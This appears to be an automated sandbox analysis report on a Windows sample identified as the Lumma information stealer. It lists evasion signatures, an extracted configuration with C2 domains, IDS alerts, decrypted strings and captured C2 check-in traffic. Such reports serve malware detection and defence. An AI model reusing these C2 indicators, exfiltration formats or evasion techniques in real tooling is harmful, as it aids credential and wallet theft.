Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532854
MD5:6d7169d90896f0347f35da82056fc955
SHA1:0ee2536b69b5b268586281be8d7925d75f6ef016
SHA256:68d7b677a0700c7a4f086354054347ba5abb50fa805fc67ef4d580643857dfb0
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6D7169D90896F0347F35DA82056FC955)
    • WerFault.exe (PID: 4416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1948 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["mobbipenju.store", "dissapoiznw.store", "bathdoomgaz.store", "licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:10.780359+020020546531A Network Trojan was detected192.168.2.649712104.21.53.8443TCP
    2024-10-14T01:53:11.774975+020020546531A Network Trojan was detected192.168.2.649713104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:10.780359+020020498361A Network Trojan was detected192.168.2.649712104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:11.774975+020020498121A Network Trojan was detected192.168.2.649713104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.622762+020020564771Domain Observed Used for C2 Detected192.168.2.6533881.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.553926+020020564711Domain Observed Used for C2 Detected192.168.2.6545101.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.590060+020020564811Domain Observed Used for C2 Detected192.168.2.6607821.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.578976+020020564831Domain Observed Used for C2 Detected192.168.2.6619391.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.645214+020020564731Domain Observed Used for C2 Detected192.168.2.6549741.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.567957+020020564851Domain Observed Used for C2 Detected192.168.2.6505851.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.633360+020020564751Domain Observed Used for C2 Detected192.168.2.6628351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:08.604996+020020564791Domain Observed Used for C2 Detected192.168.2.6509021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:53:09.989306+020028586661Domain Observed Used for C2 Detected192.168.2.649711104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.2488.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["mobbipenju.store", "dissapoiznw.store", "bathdoomgaz.store", "licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for submitted file
    Source: file.exeReversingLabs: Detection: 34%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0056D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0056D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005A99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0056FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005A5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00576F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0057D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_005A3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_005649A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00565A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_005A4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00571A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00571ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005742FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005A9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0056A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00573BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00571BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0057D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0058C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0057B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0058CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0058CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0058CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005A9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_005A9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00589510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0058FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00576536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_00568590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00570EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00571E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0056BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00576EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00566EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00576F91

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:53388 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:50585 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:60782 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:50902 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:61939 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:54510 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:54974 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:62835 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49711 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.53.8:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=EP7AiS6jYgLhT0F8cCpf9Uh1CoMcI3bTQDSWovwVusA-1728863590-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/apii
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamR
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steam
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.c
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2d-
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
